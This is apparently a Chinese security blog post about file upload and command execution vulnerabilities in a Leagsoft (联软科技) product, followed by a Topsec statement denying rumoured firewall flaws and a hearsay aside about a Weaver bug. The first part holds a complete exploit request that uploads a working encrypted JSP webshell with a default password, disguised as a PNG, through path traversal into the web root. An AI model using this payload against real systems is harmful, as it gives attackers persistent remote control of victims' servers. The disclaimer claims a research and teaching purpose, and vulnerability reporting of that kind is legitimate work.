联软科技产品存在任意文件上传和命令执行漏洞:
漏洞详情:
任意文件上传漏洞,存在于用户自检报告上传时,后台使用黑名单机制对上传的文件进行过滤和限制,由于当前黑名单机制存在缺陷,文件过滤机制可以被绕过,导致存在文件上传漏洞;利用该漏洞可以获取webshell权限。(猜测利用黑名单的其他后缀名绕过)
命令执行漏洞,存在于后台资源读取过程中,对于自动提交的用户可控参数没有进行安全检查,可以通过构造特殊参数的数据包,后台在执行过程中直接执行了提交数据包中的命令参数,导致命令执行漏洞;该漏洞能够以当前运行的中间件用户权限执行系统命令,根据中间件用户权限不同,可以进行添加系统账户,使用反弹shell等操作。
POST /uai/download/uploadfileToPath.htm HTTP/1.1
HOST: xxxxx
-----------------------------570xxxxxxxxx6025274xxxxxxxx1
Content-Disposition: form-data; name="input_localfile"; filename="xxx.jsp"
Content-Type: image/png
<%import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
-----------------------------570xxxxxxxxx6025274xxxxxxxx1
Content-Disposition: form-data; name="uploadpath"
../webapps/notifymsg/devreport/
-----------------------------570xxxxxxxxx6025274xxxxxxxx1--
又一家来辟谣的
关于近期网络传播“天融信NGFW下一代防火墙设备存在漏洞”等情况的声明
在近期的网络安全演习中,随着攻防态势白热化,互联网社交平台、社区、个人博客等众多渠道也开始出现汇总各类通用框架、组件、安全产品、网络产品等出现的“0day”漏洞情报。天融信在近日发现网络上在传播关于一则通告“预警事项”的截图
此公告内容为使用天融信NGFW设备的一个用户被发现使用了弱密码,弱口令漏洞为事件型安全漏洞,并不是指设备本身存在漏洞。
此外,对于网络传播的天融信其他安全产品存在漏洞的消息,经核实大部分为虚假消息,小部分为旧版本漏洞。我们会继续加强天融信产品相关漏洞信息的监控,并及时跟进、公开处置信息,主动向相关用户推送防护建议,与用户协同维护网络空间的清朗与安全。
来源:https://mp.weixin.qq.com/s/8IOexnTwecIc22vAj-gWiA
听说还有其他骚操作?
据说还有泛微的洞?(来自互联网)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论